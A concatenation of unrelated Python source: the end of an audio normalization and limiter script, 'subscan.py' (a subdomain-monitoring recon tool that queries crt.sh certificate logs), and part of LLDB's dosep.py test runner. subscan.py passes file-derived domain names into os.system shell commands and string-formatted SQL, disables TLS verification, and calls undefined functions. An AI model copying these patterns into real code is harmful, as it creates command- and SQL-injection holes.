# transform the coefficients with the bilinear transform
fs = sampling_rate
q = 1.0 - regularization
formulas = {
1: lambda x: (-2 * x[0] * fs + x[1] * q, 2 * x[0] * fs + x[1]),
2: lambda x: (4 * x[0] * fs**2 - 2 * x[1] * fs * q + x[2] * q**2, -8 * x[0] * fs**2 + 2 * x[1] * fs * (q - 1) + 2 * x[2] * q, 4 * x[0] * fs**2 + 2 * x[1] * fs + x[2]),
}
za, zb = (formulas[order](x) for x in (a, b))
zb = numpy.divide(zb, za[-1])
zb *= k ** order
za = numpy.divide(za, za[-1])
# apply the filter to the stream
yield from _apply_iir_filter(stream, zb, za)
def a_weighting(stream, sampling_rate):
# compute the zeros and poles for a time-continuous A-weighting filter
fr = 1000.0 # 1000Hz in IEC 61672-1
fl = 10 ** 1.5 # f_L in IEC 61672-1:2013, Appendix E.2
fa = 10 ** 2.45 # f_A in IEC 61672-1:2013, Appendix E.3
fh = 10 ** 3.9 # f_H in IEC 61672-1
fr2 = fr ** 2
fl2 = fl ** 2
fh2 = fh ** 2
c = fl2 * fh2 # c in IEC 61672-1
d = 0.5 ** 0.5 # D in IEC 61672-1
b = (fr2 + c / fr2 - d * (fl2 + fh2)) / (1.0 - d) # b in IEC 61672-1
root = (b ** 2 - 4 * c) ** 0.5
root5 = 5 ** 0.5 / 2
f1 = ((-b - root) / 2) ** 0.5 # f_1 in IEC 61672-1
f2 = (1.5 - root5) * fa # f_2 in IEC 61672-1
f3 = (1.5 + root5) * fa # f_3 in IEC 61672-1
f4 = ((-b + root) / 2) ** 0.5 # f_2 in IEC 61672-1
zeros = (0.0,) * 4
poles = numpy.multiply((f1, f1, f2, f3, f4, f4), -2 * math.pi)
# transform the zeros and poles with the matched-z-transform
num, den = (functools.reduce(numpy.polynomial.polynomial.polymul, ((-math.exp(x / sampling_rate), 1.0) for x in d)) for d in (zeros, poles))
gain = 10 ** (2.446165 / 20)
zb, za = numpy.divide(num, gain*den[-1]), numpy.divide(den, den[-1])
# apply the filter to the stream
yield from _apply_iir_filter(stream, zb, za, copy_input=True)
def activity(stream, sampling_rate, smoothing_time):
stream = iter(stream)
smoothing = numpy.exp(-2*math.pi / (smoothing_time * sampling_rate))
first = numpy.empty(shape=(int(round(sampling_rate * smoothing_time)), 2))
for i, sample in zip(range(len(first)), stream):
first[i] = sample
first = first[0:i+1]
envelope0 = envelope1 = numpy.linalg.norm(first[:, 1]) / math.sqrt(len(first))
for data in (first, stream):
for output, side_chain in data:
squared = side_chain ** 2
envelope0 = (envelope0 - squared) * smoothing + squared
envelope1 = (envelope1 - envelope0) * smoothing + envelope0
yield output, math.sqrt(envelope1)
first = None
def level(stream, sampling_rate, smoothing_time, threshold):
stream = iter(stream)
smoothing = numpy.exp(-2*math.pi / (smoothing_time * sampling_rate))
first = numpy.empty(shape=(int(round(sampling_rate * smoothing_time)), 2))
for i, sample in zip(range(len(first)), stream):
first[i] = sample
first = first[0:i+1]
envelope0 = envelope1 = numpy.linalg.norm(first[:, 1]) / math.sqrt(len(first))
threshold_factor = 10.0 ** (threshold / 20.0)
for data in (first, stream):
for output, side_chain in data:
activity = 0
if side_chain >= envelope1 * threshold_factor:
envelope0 = (envelope0 - side_chain) * smoothing + side_chain
envelope1 = (envelope1 - envelope0) * smoothing + envelope0
activity = 0.5
yield output, envelope1
first = None
def normalization(stream, level):
target_level = 10.0 ** (level / 20.0)
for output, side_chain in stream:
yield output * target_level / side_chain
def limiter(stream, sampling_rate, clip, lookahead, hold):
stream = iter(stream)
peak = 10.0 ** (clip / 20.0)
length = int(round(lookahead * sampling_rate))
buffer = numpy.zeros(length)
gain_buffer = numpy.ones(length)
ones = itertools.cycle((1.0, ))
hold = numpy.empty(int(round(hold * sampling_rate)))
release = None
for i, sample in zip(range(length), stream):
buffer[i] = sample
amplitude = max(numpy.abs(buffer))
if amplitude > peak:
target_gain = peak / amplitude
gain_buffer[:] = target_gain
release = numpy.linspace(target_gain, 1.0, length)
state = release
else:
state = ones
target_gain = 1.0
i = 0
while True:
for sample, gain in zip(stream, state):
current_gain = gain_buffer[i]
amplitude = abs(sample)
yield buffer[i] * current_gain
buffer[i] = sample
gain_buffer[i] = gain
i = (i + 1) % length
if amplitude * gain > peak:
target_gain = min(target_gain, peak / amplitude)
slope = (target_gain - current_gain) / length
slope = min(gain_buffer[i] - current_gain, slope)
if slope == 0:
gain_buffer[:] = target_gain
release = numpy.linspace(target_gain, 1.0, length)
state = release
else:
attack = numpy.arange(current_gain + slope, target_gain, slope)
gain_buffer[0:len(attack)] = attack
gain_buffer[len(attack):] = target_gain
gain_buffer = numpy.roll(gain_buffer, i)
hold[:] = target_gain
state = hold
break
else:
if state is hold:
release = numpy.linspace(target_gain, 1.0, length)
state = release
elif state is release:
target_gain = 1.0
state = ones
elif state is ones:
break
buffer = numpy.roll(buffer, -i)
gain_buffer = numpy.roll(gain_buffer, -i)
fade_out = numpy.blackman(2*length)[length:]
gain_buffer *= fade_out
for sample, gain in zip(buffer, gain_buffer):
yield sample * gain
def status(stream, length):
start = time.time()
i = 0
run = True
def poll_information():
while run:
print(f"processing the audio track: {i / length * 100:4.1f}% ({int(round(time.time() - start))}s)", end="\r")
time.sleep(2)
thread = threading.Thread(target=poll_information)
thread.daemon = True
thread.start()
for i, sample in enumerate(stream):
yield sample
run = False
thread.join()
duration = time.time() - start
print(f"processing the audio track: done in {int(duration / 60)}:{int(round(duration % 60))} minutes")
def write(stream, sampling_rate, path, bits):
buffer_size = 2**14 * 8 // bits # buffer 16kB of the outbut file before writing them to the file
buffer = numpy.empty(buffer_size)
factor = 2 ** (bits - 1) - 1
code = {16: "h", 32: "i"}[bits]
try:
import soundfile
except ImportError:
if not str(path).lower().endswith(".wav") or bits not in (16, 32):
raise ValueError("Writing files other than 16 or 32 bit wav files is not supported.\n"
"Change the file format or read the documentation about how to use the SoundFile library to support additional formats.")
with wave.open(str(path), "wb") as f:
f.setnchannels(1)
f.setsampwidth(bits // 8)
f.setframerate(int(round(sampling_rate)))
while True:
i = -1
for i, sample in zip(range(buffer_size), stream):
buffer[i] = sample
if i >= 0:
b = buffer[0:i+1]
b *= factor
mask = f"<{len(b)}{code}"
integers = numpy.round(b).astype(int)
chunk = struct.pack(mask, *integers)
f.writeframes(chunk)
else:
break
else:
file_format = {".wav": "WAV", ".flac": "FLAC"}[os.path.splitext(path)[1]]
with soundfile.SoundFile(path, mode="w",
samplerate=int(round(sampling_rate)), channels=1,
format=file_format, subtype=f"PCM_{bits}") as f:
while True:
i = -1
for i, sample in zip(range(buffer_size), stream):
buffer[i] = sample
if i >= 0:
f.write(buffer[0:i+1])
else:
break
##############################################
# If the file is used as a standalone script #
##############################################
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("source", help="the path to the audio file that shall be normalized", type=str)
parser.add_argument("target", help="the path to where the normlized audio shall be saved", type=str)
parser.add_argument("-c", "--channel", help="the channel of the input audio file", type=int, default=1)
parser.add_argument("-f", "--highpass", help="a frequency for a high pass filter", type=float, default=None)
parser.add_argument("-l", "--level", help="the target level in db[FS]", type=float, default=-20.0)
parser.add_argument("-p", "--headroom", help="the headroom in dB[FS] after limiting", type=float, default=-0.1)
parser.add_argument("-r", "--resolution", help="the resolution in bits of the target file", type=int, default=16)
parser.add_argument("-s", "--smoothing", help="the smoothing time in seconds for the level normalization", type=float, default=10.0)
parser.add_argument("-t", "--threshold", help="the level threshold in dB for the activity detection of the normalization", type=float, default=-10.0)
parser.add_argument("-a", "--lookahead", help="the lookahead time of the limiter in seconds", type=float, default=0.025)
args = parser.parse_args()
normalize(source=args.source,
target=args.target,
channel=args.channel,
highpass_frequency=args.highpass,
target_level=args.level,
headroom=args.headroom,
resolution=args.resolution,
level_smoothing=args.smoothing,
level_threshold=args.threshold,
limiter_lookahead=args.lookahead,
show_progress=True)
|
subscan.py
|
#!/usr/bin/env python
# coding: utf-8
import argparse
import dns.resolver
import sys
import requests
import json
import difflib
import os
import re
import psycopg2
from tld import get_fld
from tld.utils import update_tld_names
from termcolor import colored
import threading
is_py2 = sys.version[0] == "2" #checks if python version used == 2 in order to properly handle import of Queue module depending on the version used.
if is_py2:
import Queue as queue
else:
import queue as queue
from config import *
import time
#version = "1.0.0"
requests.packages.urllib3.disable_warnings()
def banner():
print(colored('''
##### # # ####### ###### ###### #####
# # ## # # # # # # # #
# # # # # # # # # #
##### # # # ##### ###### ###### #####
# # # # # # # # #
# # # ## # # # # #
##### # # ####### # # # #######
''', "yellow"))
print(colored(" SNE RP2 project", "green"))
print(colored(" Version: {}", "green").format(version))
def parse_args():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-u',
dest = "target",
help = "Domain to add. E.g: test.com",
required = False)
parser.add_argument('-d',
dest = "remove_domain",
help = "Domain to remove from the monitored list. E.g: yahoo.com",
required = False)
parser.add_argument('-t',
dest = "threads",
help = "Number of concurrent threads to use.",
type = int,
default = 20)
parser.add_argument('-r',
dest = "resolve",
help = "Perform DNS resolution.",
required=False,
nargs='?',
const="True")
parser.add_argument('-a',
dest = "listing",
help = "Listing all monitored domains.",
required = False,
nargs='?',
const="True")
parser.add_argument('-m',
dest = "reset",
help = "Reset everything.",
nargs='?',
const="True")
return parser.parse_args()
def domain_sanity_check(domain): #Verify the domain name sanity
if domain:
try:
domain = get_fld(domain, fix_protocol = True)
return domain
except:
print(colored("[!] Incorrect domain format.Ex: example.com, http(s)://example.com, www.example.com", "red"))
sys.exit(1)
else:
pass
def reset(do_reset): #clear the monitored list of domains and remove all locally stored files
if do_reset:
os.system("cd ./output/ && rm -f *.txt && cd .. && rm -f example.com && touch example.com ")
print(colored("\n[!] Reset was successfully. Please add new domains!", "blue"))
sys.exit(1)
else: pass
def remove_domain(domain_to_delete): #remove a domain from the monitored list
new_list = []
if domain_to_delete:
with open("example.com", "r") as domains:
for line in domains:
line = line.replace("\n", "")
if line in domain_to_delete:
os.system("rm -f ./output/{}.txt".format(line))
print(colored("\n[-] {} was successfully removed from the list.".format(line), "green"))
else:
new_list.append(line)
os.system("rm -f example.com")
with open("example.com", "w") as new_file:
for i in new_list:
new_file.write(i + "\n")
sys.exit(1)
def domains_listing(): #list all the monitored domains
global list_domains
if list_domains:
print(colored("\n[*] Below is the list of saved domain names:\n", "green"))
with open("example.com", "r") as monitored_list:
for domain in monitored_list:
print(colored("{}".format(domain.replace("\n", "")), "yellow"))
sys.exit(1)
class cert_database(object): #Connecting to crt.sh public API to retrieve subdomains
global enable_logging
def lookup(self, domain, wildcard = True):
try:
try: #connecting to crt.sh postgres database to retrieve subdomains.
unique_domains = set()
domain = domain.replace('%25.', '')
conn = psycopg2.connect("dbname={0} user={1} host={2}".format(DB_NAME, DB_USER, DB_HOST))
conn.autocommit = True
cursor = conn.cursor()
cursor.execute("SELECT ci.NAME_VALUE NAME_VALUE FROM certificate_identity ci WHERE ci.NAME_TYPE = 'dNSName' AND reverse(lower(ci.NAME_VALUE)) LIKE reverse(lower('%{}'));".format(domain))
for result in cursor.fetchall():
matches = re.findall(r"\'(.+?)\'", str(result))
for subdomain in matches:
try:
if get_fld("https://" + subdomain) == domain:
unique_domains.add(subdomain.lower())
except: pass
return sorted(unique_domains)
except:
error = "Unable to connect to the database. We will attempt to use the API instead."
errorlog(error, enable_logging)
except:
base_url = "https://crt.sh/?q={}&output=json"
if wildcard:
domain = "%25.{}".format(domain)
url = base_url.format(domain)
subdomains = set()
user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0'
req = requests.get(url, headers={'User-Agent': user_agent}, timeout=20, verify=False) #times out after 8 seconds waiting
if req.status_code == 200:
try:
content = req.content.decode('utf-8')
data = json.loads(content)
for subdomain in data:
subdomains.add(subdomain["name_value"].lower())
return sorted(subdomains)
except:
error = "Error retrieving information for {}.".format(domain.replace('%25.', ''))
errorlog(error, enable_logging)
def queuing(): #using the queue for multithreading purposes
global domain_to_monitor
global q1
global q2
q1 = queue.Queue(maxsize=0)
q2 = queue.Queue(maxsize=0)
if domain_to_monitor:
pass
elif os.path.getsize("domains.txt") == 0:
print(colored("[!] Please consider adding a list of domains to monitor first.", "red"))
sys.exit(1)
else:
with open("domains.txt", "r") as targets:
for line in targets:
if line != "":
q1.put(line.replace('\n', ''))
q2.put(line.replace('\n', ''))
else: pass
def adding_new_domain(q1): #adds a new domain to the monitoring list
unique_list = []
global domain_to_monitor
global input
if domain_to_monitor:
if not os.path.isfile('./domains.txt'): #check if domains.txt exist, if not create a new one
os.system("touch domains.txt")
else: pass
with open("domains.txt", "r+") as domains: #checking domain name isn't already monitored
for line in domains:
if domain_to_monitor == line.replace('\n', ''):
print(colored("[!] The domain name {} is already being monitored.".format(domain_to_monitor), "red"))
sys.exit(1)
response = cert_database().lookup(domain_to_monitor)
with open("./output/" + domain_to_monitor.lower() + ".txt", "a") as subdomains: #saving a copy of current subdomains
for subdomain in response:
subdomains.write(subdomain + "\n")
with open("domains.txt", "a") as domains: #fetching subdomains if not monitored
domains.write(domain_to_monitor.lower() + '\n')
print(colored("\n[+] Adding {} to the list of domains.\n".format(domain_to_monitor), "blue"))
try: input = raw_input #fixes python 2.x and 3.x input keyword
except NameError: pass
choice = input(colored("[?] Do you wish to list subdomains found for {}? [Y]es [N]o (default: [N]) ".format(domain_to_monitor), "blue")) #listing subdomains upon request
if choice.upper() == "Y":
if response:
for subdomain in response:
unique_list.append(subdomain)
unique_list = list(set(unique_list))
for subdomain in unique_list:
print(colored(subdomain, "yellow"))
else:
print(colored("\n[!] Unfortunately, we couldn't find any subdomain for {}".format(domain_to_monitor), "red"))
else:
sys.exit(1)
else: #checks if a domain is monitored but has no text file saved in ./output
try:
line = q1.get(timeout=10)
if not os.path.isfile("./output/" + line.lower() + ".txt"):
response = cert_database().lookup(line)
if response:
with open("./output/" + line.lower() + ".txt", "a") as subdomains:
for subdomain in response:
subdomains.write(subdomain + "\n")
else: pass
else: pass
except queue.Empty:
pass
def check_new_subdomains(q2): #retrieves new list of subdomains and stores a temporary text file for comparaison purposes
global domain_to_monitor
global domain_to_delete
if domain_to_monitor is None:
if domain_to_delete is None:
try:
line = q2.get(timeout=10)
print("[*] Checking {}".format(line))
with open("./output/" + line.lower() + "_tmp.txt", "a") as subs:
response = cert_database().lookup(line)
if response:
for subdomain in response:
subs.write(subdomain + "\n")
except queue.Empty:
pass
else: pass
def compare_files_diff(domain_to_monitor): #compares the temporary text file with previously stored copy to check if there are new subdomains
global enable_logging
if domain_to_monitor is None:
if domain_to_delete is None:
result = []
with open("domains.txt", "r") as targets:
for line in targets:
domain_to_monitor = line.replace('\n', '')
try:
file1 = open("./output/" + domain_to_monitor.lower() + '.txt', 'r')
file2 = open("./output/" + domain_to_monitor.lower() + '_tmp.txt', 'r')
diff = difflib.ndiff(file1.readlines(), file2.readlines())
changes = [l for l in diff if l.startswith('+ ')] #check if there are new items/subdomains
newdiff = []
for c in changes:
c = c.replace('+ ', '')
c = c.replace('*.', '')
c = c.replace('\n', '')
result.append(c)
result = list(set(result)) #remove duplicates
except:
error = "There was an error opening one of the files: {} or {}".format(domain_to_monitor + '.txt', domain_to_monitor + '_tmp.txt')
errorlog(error, enable_logging)
os.system("rm -f ./output/{}".format(line.replace('\n','') + "_tmp.txt"))
return(result)
def dns_resolution(new_subdomains): #Perform DNS resolution on retrieved subdomains
dns_results = {}
subdomains_to_resolve = new_subdomains
print(colored("\n[!] Performing DNS resolution. Please do not interrupt!", "red"))
for domain in subdomains_to_resolve:
domain = domain.replace('+ ','')
domain = domain.replace('*.','')
dns_results[domain] = {}
try:
for qtype in ['A','CNAME']:
dns_output = dns.resolver.query(domain,qtype, raise_on_no_answer = False)
if dns_output.rrset is None:
pass
elif dns_output.rdtype == 1:
a_records = [str(i) for i in dns_output.rrset]
dns_results[domain]["A"] = a_records
elif dns_output.rdtype == 5:
cname_records = [str(i) for i in dns_output.rrset]
dns_results[domain]["CNAME"] = cname_records
else: pass
except dns.resolver.NXDOMAIN:
pass
except dns.resolver.Timeout:
dns_results[domain]["A"] = eval('["Timed out while resolving."]')
dns_results[domain]["CNAME"] = eval('["Timed out error while resolving."]')
pass
except dns.exception.DNSException:
dns_results[domain]["A"] = eval('["There was an error while resolving."]')
dns_results[domain]["CNAME"] = eval('["There was an error while resolving."]')
pass
if dns_results:
return posting_to_slack(None, True, dns_results) #Slack new subdomains with DNS ouput
else:
return posting_to_slack(None, False, None) #Nothing found notification
def multithreading(threads):
global domain_to_monitor
threads_list = []
if not domain_to_monitor:
num = sum(1 for line in open("domains.txt")) #minimum threads executed equals the number of monitored domains
for i in range(max(threads, num)):
if not (q1.empty() and q2.empty()):
t1 = threading.Thread(target = adding_new_domain, args = (q1, ))
t2 = threading.Thread(target = check_new_subdomains, args = (q2, ))
t1.start()
t2.start()
threads_list.append(t1)
threads_list.append(t2)
else:
adding_new_domain(domain_to_monitor)
for t in threads_list:
t.join()
if __name__ == '__main__':
#parse arguments
dns_resolve = parse_args().resolve
#enable_logging = parse_args().logging
list_domains = parse_args().listing
domain_to_monitor = domain_sanity_check(parse_args().target)
domain_to_delete = domain_sanity_check(parse_args().remove_domain)
do_reset = parse_args().reset
#execute the various functions
banner()
reset(do_reset)
remove_domain(domain_to_delete)
domains_listing()
queuing()
multithreading(parse_args().threads)
new_subdomains = compare_files_diff(domain_to_monitor)
# Check if DNS resolution is checked
if not domain_to_monitor:
if (dns_resolve and new_subdomains):
dns_resolution(new_subdomains)
else:
posting_to_slack(new_subdomains, False, None)
else: pass
|
dosep.py
|
"""
Run the test suite using a separate process for each test file.
Each test will run with a time limit of 10 minutes by default.
Override the default time limit of 10 minutes by setting
the environment variable LLDB_TEST_TIMEOUT.
E.g., export LLDB_TEST_TIMEOUT=10m
Override the time limit for individual tests by setting
the environment variable LLDB_[TEST NAME]_TIMEOUT.
E.g., export LLDB_TESTCONCURRENTEVENTS_TIMEOUT=2m
Set to "0" to run without time limit.
E.g., export LLDB_TEST_TIMEOUT=0
or export LLDB_TESTCONCURRENTEVENTS_TIMEOUT=0
To collect core files for timed out tests,
do the following before running dosep.py
OSX
ulimit -c unlimited
sudo sysctl -w kern.corefile=core.%P
Linux:
ulimit -c unlimited
echo core.%p | sudo tee /proc/sys/kernel/core_pattern
"""
from __future__ import absolute_import
from __future__ import print_function
# system packages and modules
import asyncore
import distutils.version
import fnmatch
import multiprocessing
import multiprocessing.pool
import os
import platform
import re
import signal
import sys
import threading
from six import StringIO
from six.moves import queue
# Our packages and modules
import lldbsuite
import lldbsuite.support.seven as seven
from . import configuration
from . import dotest_args
from lldbsuite.support import optional_with
from lldbsuite.test_event import dotest_channels
from lldbsuite.test_event.event_builder import EventBuilder
from lldbsuite.test_event import formatter
from .test_runner import process_control
# Status codes for running command with timeout.
eTimedOut, ePassed, eFailed = 124, 0, 1
g_session_dir = None
g_runner_context = None
output_lock = None
test_counter = None
total_tests = None
test_name_len = None
dotest_options = None
RESULTS_FORMATTER = None
RUNNER_PROCESS_ASYNC_MAP = None
RESULTS_LISTENER_CHANNEL = None
"""Contains an optional function pointer that can return the worker index
for the given thread/process calling it. Returns a 0-based index."""
GET_WORKER_INDEX = None
def setup_global_variables(
lock, counter, total, name_len, options, worker_index_map):
global output_lock, test_counter, total_tests, test_name_len
global dotest_options
output_lock = lock
test_counter = counter
total_tests = total
test_name_len = name_len
dotest_options = options
if worker_index_map is not None:
# We'll use the output lock for this to avoid sharing another lock.
# This won't be used much.
index_lock = lock
def get_worker_index_use_pid():
"""Returns a 0-based, process-unique index for the worker."""
pid = os.getpid()
with index_lock:
if pid not in worker_index_map:
worker_index_map[pid] = len(worker_index_map)
return worker_index_map[pid]
global GET_WORKER_INDEX
GET_WORKER_INDEX = get_worker_index_use_pid
def report_test_failure(name, command, output, timeout):
global output_lock
with output_lock:
if not (RESULTS_FORMATTER and RESULTS_FORMATTER.is_using_terminal()):
print(file=sys.stderr)
print(output, file=sys.stderr)
if timeout:
timeout_str = " (TIMEOUT)"
else:
timeout_str = ""
print("[%s FAILED]%s" % (name, timeout_str), file=sys.stderr)
print("Command invoked: %s" % ' '.join(command), file=sys.stderr)
update_progress(name)
def report_test_pass(name, output):
global output_lock
with output_lock:
update_progress(name)
def update_progress(test_name=""):
global output_lock, test_counter, total_tests, test_name_len
with output_lock:
counter_len = len(str(total_tests))
if not (RESULTS_FORMATTER and RESULTS_FORMATTER.is_using_terminal()):
sys.stderr.write(
"\r%*d out of %d test suites processed - %-*s" %
(counter_len, test_counter.value, total_tests,
test_name_len.value, test_name))
if len(test_name) > test_name_len.value:
test_name_len.value = len(test_name)
test_counter.value += 1
sys.stdout.flush()
sys.stderr.flush()
def parse_test_results(output):
passes = 0
failures = 0
unexpected_successes = 0
for result in output:
pass_count = re.search("^RESULT:.*([0-9]+) passes",
result, re.MULTILINE)
fail_count = re.search("^RESULT:.*([0-9]+) failures",
result, re.MULTILINE)
error_count = re.search("^RESULT:.*([0-9]+) errors",
result, re.MULTILINE)
unexpected_success_count = re.search(
"^RESULT:.*([0-9]+) unexpected successes", result, re.MULTILINE)
if pass_count is not None:
passes = passes + int(pass_count.group(1))
if fail_count is not None:
failures = failures + int(fail_count.group(1))
if unexpected_success_count is not None:
unexpected_successes = unexpected_successes + \
int(unexpected_success_count.group(1))
if error_count is not None:
failures = failures + int(error_count.group(1))
return passes, failures, unexpected_successes
class DoTestProcessDriver(process_control.ProcessDriver):
"""Drives the dotest.py inferior process and handles bookkeeping."""
def __init__(self, output_file, output_file_lock, pid_events, file_name,
soft_terminate_timeout):
super(DoTestProcessDriver, self).__init__(
soft_terminate_timeout=soft_terminate_timeout)
self.output_file = output_file
self.output_lock = optional_with.optional_with(output_file_lock)
self.pid_events = pid_events
self.results = None
self.file_name = file_name
def write(self, content):
with self.output_lock:
self.output_file.write(content)
def on_process_started(self):
if self.pid_events:
self.pid_events.put_nowait(('created', self.process.pid))
def on_process_exited(self, command, output, was_timeout, exit_status):
if self.pid_events:
# No point in culling out those with no exit_status (i.e.
# those we failed to kill). That would just cause
# downstream code to try to kill it later on a Ctrl-C. At
# this point, a best-effort-to-kill already took place. So
# call it destroyed here.
self.pid_events.put_nowait(('destroyed', self.process.pid))
# Override the exit status if it was a timeout.
if was_timeout:
exit_status = eTimedOut
# If we didn't end up with any output, call it empty for
# stdout/stderr.
if output is None:
output = ('', '')
# Now parse the output.
passes, failures, unexpected_successes = parse_test_results(output)
if exit_status == 0:
# stdout does not have any useful information from 'dotest.py',
# only stderr does.
report_test_pass(self.file_name, output[1])
else:
report_test_failure(
self.file_name,
command,
output[1],
was_timeout)
# Save off the results for the caller.
self.results = (
self.file_name,
exit_status,
passes,
failures,
unexpected_successes)
def on_timeout_pre_kill(self):
# We're just about to have a timeout take effect. Here's our chance
# to do a pre-kill action.
# For now, we look to see if the lldbsuite.pre_kill module has a
# runner for our platform.
module_name = "lldbsuite.pre_kill_hook." + platform.system().lower()
import importlib
try:
module = importlib.import_module(module_name)
except ImportError:
# We don't have one for this platform. Skip.
sys.stderr.write("\nwarning: no timeout handler module: " +
module_name + "\n")
return
# Try to run the pre-kill-hook method.
try:
# Run the pre-kill command.
output_io = StringIO()
module.do_pre_kill(self.pid, g_runner_context, output_io)
# Write the output to a filename associated with the test file and
# pid.
MAX_UNCOMPRESSED_BYTE_COUNT = 10 * 1024
content = output_io.getvalue()
compress_output = len(content) > MAX_UNCOMPRESSED_BYTE_COUNT
basename = "{}-{}.sample".format(self.file_name, self.pid)
sample_path = os.path.join(g_session_dir, basename)
if compress_output:
# Write compressed output into a .zip file.
from zipfile import ZipFile, ZIP_DEFLATED
zipfile = sample_path + ".zip"
with ZipFile(zipfile, "w", ZIP_DEFLATED) as sample_zip:
sample_zip.writestr(basename, content)
else:
# Write raw output into a text file.
with open(sample_path, "w") as output_file:
output_file.write(content)
except Exception as e:
sys.stderr.write("caught exception while running "
"pre-kill action: {}\n".format(e))
return
def is_exceptional_exit(self):
"""Returns whether the process returned a timeout.
Not valid to call until after on_process_exited() completes.
@return True if the exit is an exceptional exit (e.g. signal on
POSIX); False otherwise.
"""
if self.results is None:
raise Exception(
"exit status checked before results are available")
return self.process_helper.is_exceptional_exit(
self.results[1])
def exceptional_exit_details(self):
if self.results is None:
raise Exception(
"exit status checked before results are available")
return self.process_helper.exceptional_exit_details(self.results[1])
def is_timeout(self):
if self.results is None:
raise Exception(
"exit status checked before results are available")
return self.results[1] == eTimedOut
def get_soft_terminate_timeout():
# Defaults to 10 seconds, but can set
# LLDB_TEST_SOFT_TERMINATE_TIMEOUT to a floating point
# number in seconds. This value indicates how long
# the test runner will wait for the dotest inferior to
# handle a timeout via a soft terminate before it will
# assume that failed and do a hard terminate.
# TODO plumb through command-line option
return float(os.environ.get('LLDB_TEST_SOFT_TERMINATE_TIMEOUT', 10.0))
def want_core_on_soft_terminate():
# TODO plumb through command-line option
if platform.system() == 'Linux':
return True
else:
return False
def send_events_to_collector(events, command):
"""Sends the given events to the collector described in the command line.
@param events the list of events to send to the test event collector.
@param command the inferior command line which contains the details on
how to connect to the test event collector.
"""
if events is None or len(events) == 0:
# Nothing to do.
return
# Find the port we need to connect to from the --results-port option.
try:
arg_index = command.index("--results-port") + 1
except ValueError:
# There is no results port, so no way to communicate back to
# the event collector. This is not a problem if we're not
# using event aggregation.
# TODO flag as error once we always use the event system
print(
"INFO: no event collector, skipping post-inferior test "
"event reporting")
return
if arg_index >= len(command):
raise Exception(
"expected collector port at index {} in {}".format(
arg_index, command))
event_port = int(command[arg_index])
# Create results formatter connected back to collector via socket.
config = formatter.FormatterConfig()
config.port = event_port
formatter_spec = formatter.create_results_formatter(config)
if formatter_spec is None or formatter_spec.formatter is None:
raise Exception(
"Failed to create socket-based ResultsFormatter "
"back to test event collector")
# Send the events: the port-based event just pickles the content
# and sends over to the server side of the socket.
for event in events:
formatter_spec.formatter.handle_event(event)
# Cleanup
if formatter_spec.cleanup_func is not None:
formatter_spec.cleanup_func()
def send_inferior_post_run_events(
command, worker_index, process_driver, test_filename):
"""Sends any test events that should be generated after the inferior runs.
These events would include timeouts and exceptional (i.e. signal-returning)
process completion results.
@param command the list of command parameters passed to subprocess.Popen().
@param worker_index the worker index (possibly None) used to run
this process
@param process_driver the ProcessDriver-derived instance that was used
to run the inferior process.
@param test_filename the full path to the Python test file that is being
run.
"""
if process_driver is None:
raise Exception("process_driver must not be None")
if process_driver.results is None:
# Invalid condition - the results should have been set one way or
# another, even in a timeout.
raise Exception("process_driver.results were not set")
# The code below fills in the post events struct. If there are any post
# events to fire up, we'll try to make a connection to the socket and
# provide the results.
post_events = []
# Handle signal/exceptional exits.
if process_driver.is_exceptional_exit():
(code, desc) = process_driver.exceptional_exit_details()
post_events.append(
EventBuilder.event_for_job_exceptional_exit(
process_driver.pid,
worker_index,
code,
desc,
test_filename,
command))
# Handle timeouts.
if process_driver.is_timeout():
post_events.append(EventBuilder.event_for_job_timeout(
process_driver.pid,
worker_index,
test_filename,
command))
if len(post_events) > 0:
send_events_to_collector(post_events, command)
def call_with_timeout(
command, timeout, name, inferior_pid_events, test_filename):
# Add our worker index (if we have one) to all test events
# from this inferior.
worker_index = None
if GET_WORKER_INDEX is not None:
try:
worker_index = GET_WORKER_INDEX()
command.extend([
"--event-add-entries",
"worker_index={}:int".format(worker_index)])
except: # pylint: disable=bare-except
# Ctrl-C does bad things to multiprocessing.Manager.dict()
# lookup. Just swallow it.
pass
# Create the inferior dotest.py ProcessDriver.
soft_terminate_timeout = get_soft_terminate_timeout()
want_core = want_core_on_soft_terminate()
process_driver = DoTestProcessDriver(
sys.stdout,
output_lock,
inferior_pid_events,
name,
soft_terminate_timeout)
# Run it with a timeout.
process_driver.run_command_with_timeout(command, timeout, want_core)
# Return the results.
if not process_driver.results:
# This is truly exceptional. Even a failing or timed out
# binary should have called the results-generation code.
raise Exception("no test results were generated whatsoever")
# Handle cases where the test inferior cannot adequately provide
# meaningful results to the test event system.
send_inferior_post_run_events(
command,
worker_index,
process_driver,
test_filename)
return process_driver.results
def process_file(test_file, dotest_argv, inferior_pid_events):
"""Run tests in the specified file in a subprocess and gather the results."""
results = []
base_name = os.path.basename(test_file)
import __main__ as main
global dotest_options
if not dotest_options.p or re.search(dotest_options.p, base_name):
script_file = main.__file__
command = ([sys.executable, script_file] +
dotest_argv +
["-S", dotest_options.session_file_format] +
["--inferior", "-p", base_name, os.path.dirname(test_file)])
timeout_name = os.path.basename(os.path.splitext(base_name)[0]).upper()
timeout = (os.getenv("LLDB_%s_TIMEOUT" % timeout_name) or
getDefaultTimeout(dotest_options.lldb_platform_name))
results.append(call_with_timeout(
command, timeout, base_name, inferior_pid_events, test_file))
# result = (name, status, passes, failures, unexpected_successes)
timed_out = [name for name, status, _, _, _ in results
if status == eTimedOut]
passed = [name for name, status, _, _, _ in results
if status == ePassed]
failed = [name for name, status, _, _, _ in results
if status != ePassed]
unexpected_passes = [
name for name, _, _, _, unexpected_successes in results
if unexpected_successes > 0]
pass_count = sum([result[2] for result in results])
fail_count = sum([result[3] for result in results])
return (
timed_out, passed, failed, unexpected_passes, pass_count, fail_count)
in_q = None
out_q = None
def process_dir_worker_multiprocessing(
a_output_lock, a_test_counter, a_total_tests, a_test_name_len,
a_dotest_options, job_queue, result_queue, inferior_pid_events,
worker_index_map):
"""Worker thread main loop when in multiprocessing mode.
Takes one directory specification at a time and works on it."""
# Shut off interrupt handling in the child process.
signal.signal(signal.SIGINT, signal.SIG_IGN)
if hasattr(signal, 'SIGHUP'):
signal.signal(signal.SIGHUP, signal.SIG_IGN)
# Setup the global state for the worker process.
setup_global_variables(
a_output_lock, a_test_counter, a_total_tests, a_test_name_len,
